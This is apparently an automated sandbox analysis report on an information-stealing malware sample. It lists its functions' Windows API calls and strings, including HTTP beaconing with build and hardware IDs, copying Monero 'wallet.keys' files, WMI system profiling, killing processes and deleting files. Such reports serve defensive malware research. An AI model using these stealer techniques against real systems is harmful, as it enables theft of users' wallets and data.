                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00408FD0
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 004110F0: memset.MSVCRT ref: 0041110A
                                                                                          • Part of subcall function 004110F0: GetProcessHeap.KERNEL32(00000000,000000FA,00000000,00000000,?,00409753,00409C77), ref: 0041113D
                                                                                          • Part of subcall function 004110F0: HeapAlloc.KERNEL32(00000000,?,00409753,00409C77), ref: 00411144
                                                                                          • Part of subcall function 004110F0: wsprintfW.USER32 ref: 00411153
                                                                                          • Part of subcall function 004110F0: OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 004111BB
                                                                                          • Part of subcall function 004110F0: TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 004111CA
                                                                                          • Part of subcall function 004110F0: CloseHandle.KERNEL32(00000000,?,?), ref: 004111D1
                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 00409263
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcat$lstrcpy$HeapProcess$Filelstrlen$Copy$AllocAllocateCloseDeleteHandleOpenSystemTerminateTimememsetwsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 2344884248-0
                                                                                        • Opcode ID: 8a32bd120c3de7648835aa62839e96a1e8851a43be6b95bb348c2e23e5ccfc88
                                                                                        • Instruction ID: 01af279fe34659f2e92758b1277113fc8cf4a0ef9ee58042c38a489971cdbd96
                                                                                        • Opcode Fuzzy Hash: 8a32bd120c3de7648835aa62839e96a1e8851a43be6b95bb348c2e23e5ccfc88
                                                                                        • Instruction Fuzzy Hash: 9AD13E72910504ABCB24FBA1DD56DEE7379AF54305F14813EF502724E2EF386A09CBA9
                                                                                        Function 00403E20 Relevance: 30.2, APIs: 13, Strings: 4, Instructions: 457networkfilestringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DA2
                                                                                          • Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DAF
                                                                                          • Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DBC
                                                                                          • Part of subcall function 00403D70: lstrlenA.KERNEL32(00000000,00000000,0000003C,00000000,?,00000030), ref: 00403DD6
                                                                                          • Part of subcall function 00403D70: InternetCrackUrlA.WININET(00000000,00000000), ref: 00403DE6
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403EAC
                                                                                        • StrCmpCA.SHLWAPI(?,0169A3B0,?,?,?,?,?,?,00000030), ref: 00403EC7
                                                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040400D
                                                                                        • HttpOpenRequestA.WININET(00000000,0169A460,?,0169B128,00000000,00000000,-00400100,00000000), ref: 00404048
                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 0040406C
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
                                                                                          • Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D
                                                                                        • lstrlenA.KERNEL32(00000000,00000000,?,?,00416B92,?,004201E9,00000000,00416B92,?,00000000,00416B92,",00000000,00416B92,build_id), ref: 004042BD
                                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000030), ref: 004042D6
                                                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004042E7
                                                                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004042FE
                                                                                        • InternetReadFile.WININET(00000000,00000000,000007CF,?), ref: 0040434A
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00404355
                                                                                        • InternetCloseHandle.WININET(?), ref: 00404367
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00404371
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$FileHttpOpenReadRequestlstrcat$ConnectCrackOptionSend
                                                                                        • String ID: "$------$build_id$hwid
                                                                                        • API String ID: 1585128682-50533134
                                                                                        • Opcode ID: d0a5a0a515663f665d08bbeb1d1109fba58a5cce67514d4fc39d3ba5028ee652
                                                                                        • Instruction ID: b133d135036fceaf129ec02b97349a15de150af5b357d63d1a2f8011ac320ed4
                                                                                        • Opcode Fuzzy Hash: d0a5a0a515663f665d08bbeb1d1109fba58a5cce67514d4fc39d3ba5028ee652
                                                                                        • Instruction Fuzzy Hash: 7DF1FE72910108AEDB15FBA1DC92EEE7378AF54704F54817EB112724D1EF386A0DCBA8
                                                                                        Function 00412000 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 295stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • strtok_s.MSVCRT ref: 0041202B
                                                                                        • lstrcpyA.KERNEL32(?,00000000,?,00000104,?,00000104,00000104), ref: 004120C1
                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 004120FA
                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 0041213C
                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 0041217E
                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 004121BF
                                                                                        • StrCmpCA.SHLWAPI(00000000,true,?), ref: 00412322
                                                                                        • strtok_s.MSVCRT ref: 004123AC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcpy$strtok_s
                                                                                        • String ID: anA$false$true
                                                                                        • API String ID: 2610293679-3558530194
                                                                                        • Opcode ID: 3386de19d766336cc89c77304d2fc18588b83f4d6ece37205452856df6fb31f9
                                                                                        • Instruction ID: 28ec9be6b1e855a5d5ad00fa29704b442616d7bac6571d6649f76a51c6d16edf
                                                                                        • Opcode Fuzzy Hash: 3386de19d766336cc89c77304d2fc18588b83f4d6ece37205452856df6fb31f9
                                                                                        • Instruction Fuzzy Hash: B1A1B7B2D00204ABDB24EBB1DC45DEE777DEF54304F00456EF51AA6142EB78A6C9CB94
                                                                                        Function 00410730 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 171memorycomtimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000030,00000000,00000000,?,Windows: ,00000000,?,00423684,00000000,?,Work Dir: In memory,00000000), ref: 00410758
                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000030,00000000,00000000,?,Windows: ,00000000), ref: 00410769
                                                                                        • CoCreateInstance.OLE32(004249C0,00000000,00000001,004248F0,00000000,?,00000030,00000000,00000000,?,Windows: ,00000000,?,00423684,00000000,?), ref: 00410783
                                                                                        • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000030,00000000,00000000,?,Windows: ,00000000,?), ref: 004107BC
                                                                                        • VariantInit.OLEAUT32(?), ref: 0041081B
                                                                                          • Part of subcall function 00410630: CoCreateInstance.OLE32(00424770,00000000,00000001,004238C4,00410847,00000000,00000000,00000030,00410847,00000030,?,00000001,?,00000030,00000000,00000000), ref: 0041066D
                                                                                          • Part of subcall function 00410630: SysAllocString.OLEAUT32(?), ref: 0041067B
                                                                                          • Part of subcall function 00410630: _wtoi64.MSVCRT ref: 004106BA
                                                                                          • Part of subcall function 00410630: SysFreeString.OLEAUT32(?), ref: 004106D9
                                                                                          • Part of subcall function 00410630: SysFreeString.OLEAUT32(00000000), ref: 004106E0
                                                                                        • FileTimeToSystemTime.KERNEL32(?,00000000,?,?,00000030,00000000,00000000,?,Windows: ,00000000,?,00423684,00000000,?,Work Dir: In memory,00000000), ref: 00410852
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000030,00000000,00000000,?,Windows: ,00000000,?,00423684,00000000,?,Work Dir: In memory,00000000), ref: 0041085E
                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,00000030,00000000,00000000,?,Windows: ,00000000,?,00423684,00000000,?,Work Dir: In memory,00000000,?), ref: 00410865
                                                                                        • VariantClear.OLEAUT32(?), ref: 004108A9
                                                                                        • wsprintfA.USER32 ref: 00410891
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileInitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                        • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$WQL
                                                                                        • API String ID: 1611285705-271508173
                                                                                        • Opcode ID: 09b10624150b565fb9ee4139e1e133b027331012701015932dd590229877180f
                                                                                        • Instruction ID: f60bae9c613f7fa121a8b30a4fe63b67029c37922dcc64605f50a105dcd30c53
                                                                                        • Opcode Fuzzy Hash: 09b10624150b565fb9ee4139e1e133b027331012701015932dd590229877180f
                                                                                        • Instruction Fuzzy Hash: 4B515071A01228BBCB24DB95DC45EEFBBBCEF49B10F104116F515A7280D7799A41CBE4
                                                                                        Function 00401A30 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 180registrymemorystringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00401A48
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401A5E
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00401A65
                                                                                        • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00416D8D), ref: 00401A82
                                                                                        • RegQueryValueExA.ADVAPI32(00416D8D,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401A9C
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 004142A0: Sleep.KERNEL32(000003E8,?,=OA,?,?,00000000), ref: 00414345
                                                                                          • Part of subcall function 004142A0: CreateThread.KERNEL32(00000000,00000000,004130F0,?,00000000,00000000), ref: 0041438D
                                                                                          • Part of subcall function 004142A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00414399
                                                                                        • RegCloseKey.ADVAPI32(00416D8D), ref: 00401AA6
                                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00401AB4
                                                                                        • lstrlenA.KERNEL32(?), ref: 00401AC1
                                                                                        • lstrcatA.KERNEL32(?,.keys), ref: 00401ADC
                                                                                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401BC6
                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 00401C32
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileHeaplstrcat$AllocCloseCopyCreateDeleteObjectOpenProcessQuerySingleSleepThreadValueWaitlstrcpylstrlenmemset
                                                                                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                        • API String ID: 709784044-218353709
                                                                                        • Opcode ID: 6c78f9737e0f4eb0430da094aef2da056fb3a29fe2d1524e8419046d69aa5cf9
                                                                                        • Instruction ID: f1d60a6bbfd1a10beadc68d07a737e3e9b1c6f7b3b4a17850d8004e5f304ac36
                                                                                        • Opcode Fuzzy Hash: 6c78f9737e0f4eb0430da094aef2da056fb3a29fe2d1524e8419046d69aa5cf9
                                                                                        • Instruction Fuzzy Hash: CF513E72910108ABDB14FBA1DD56EEE737DAF54304F50803EF506724D2EB786A08CBA9
                                                                                        Function 004139E0 Relevance: 25.1, APIs: 11, Strings: 3, Instructions: 633sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040F8A0: lstrlenA.KERNEL32(004176BE,?,00000000,?,00416587,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 0040F8AB
                                                                                          • Part of subcall function 0040F8A0: lstrcpyA.KERNEL32(00000000,004176BE), ref: 0040F8E2
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413B47
                                                                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413BAA
                                                                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413CF3
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 00412EE0: StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?,?,?,?,?,?,?,?,?,00413AD4), ref: 00412F20
                                                                                          • Part of subcall function 00412FA0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00412FFA
                                                                                          • Part of subcall function 00412FA0: lstrlenA.KERNEL32(00000000), ref: 00413011
                                                                                          • Part of subcall function 00412FA0: StrStrA.SHLWAPI(00000000,00000000), ref: 00413039
                                                                                          • Part of subcall function 00412FA0: lstrlenA.KERNEL32(00000000), ref: 0041304E
                                                                                          • Part of subcall function 00412FA0: lstrlenA.KERNEL32(00000000), ref: 0041306B
                                                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413C90
                                                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413DD9
                                                                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413E3C
                                                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413F22
                                                                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413F85
                                                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041406B
                                                                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004140C8
                                                                                        • Sleep.KERNEL32(0000EA60), ref: 004140D7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcpylstrlen$Sleep
                                                                                        • String ID: 9jA$9jA$ERROR
                                                                                        • API String ID: 507064821-3453893218
                                                                                        • Opcode ID: 0ea8e545eb3128f4f77ed40ce8583ede3be02ffdb08c09b4d87bab1d85280d1e
                                                                                        • Instruction ID: cf25ed66686d9262e125a475b4914be09e4212f98396e3805e3bfcd737600e71
                                                                                        • Opcode Fuzzy Hash: 0ea8e545eb3128f4f77ed40ce8583ede3be02ffdb08c09b4d87bab1d85280d1e
                                                                                        • Instruction Fuzzy Hash: B82220729102086ACB24FB72DD57ADE773C6F14348F50857EB80672496EF3C674C8A69
                                                                                        Function 0040FFC0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 180registrystringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                        • RegOpenKeyExA.KERNEL32(00000000,01696E38,00000000,00020019,00000000,004201E9), ref: 00410009
                                                                                        • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410052
                                                                                        • wsprintfA.USER32 ref: 0041007C
                                                                                        • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0041009A
                                                                                        • RegQueryValueExA.KERNEL32(00000000,0169A7A0,00000000,000F003F,?,00000400), ref: 004100CA
                                                                                        • lstrlenA.KERNEL32(?), ref: 004100DF
                                                                                        • RegQueryValueExA.KERNEL32(00000000,0169A578,00000000,000F003F,?,00000400,00000000,?,?,00000000,80000002,00423408), ref: 00410156
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: OpenQueryValuelstrcpy$Enumlstrlenwsprintf
                                                                                        • String ID: - $%s\%s$?
                                                                                        • API String ID: 1989970852-3278919252
                                                                                        • Opcode ID: 8a58cbb879ff4631560fe32f29b8c87e8684d69af0c42c52604faec2b0e2a397
                                                                                        • Instruction ID: 86116914c5d038b2623fcf9dac74439a401e9ecf48d0cd90823b8e99bbc113d5
                                                                                        • Opcode Fuzzy Hash: 8a58cbb879ff4631560fe32f29b8c87e8684d69af0c42c52604faec2b0e2a397
                                                                                        • Instruction Fuzzy Hash: 47613EB2900109AFDB14EB91DC95FEFB77DEF44704F00816AF605A3590EB786A49CBA4
                                                                                        Function 004043E0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 176networkmemoryfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DA2
                                                                                          • Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DAF
                                                                                          • Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DBC
                                                                                          • Part of subcall function 00403D70: lstrlenA.KERNEL32(00000000,00000000,0000003C,00000000,?,00000030), ref: 00403DD6
                                                                                          • Part of subcall function 00403D70: InternetCrackUrlA.WININET(00000000,00000000), ref: 00403DE6
                                                                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF,?,?,?,?,?,?,00000030), ref: 0040441C
                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,?,00000030), ref: 00404423
                                                                                        • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404442
                                                                                        • StrCmpCA.SHLWAPI(?,0169A3B0,?,?,?,?,?,?,00000030), ref: 0040445A
                                                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404482
                                                                                        • HttpOpenRequestA.WININET(00000000,GET,?,0169B128,00000000,00000000,-00400100,00000000), ref: 004044BC
                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004044E0
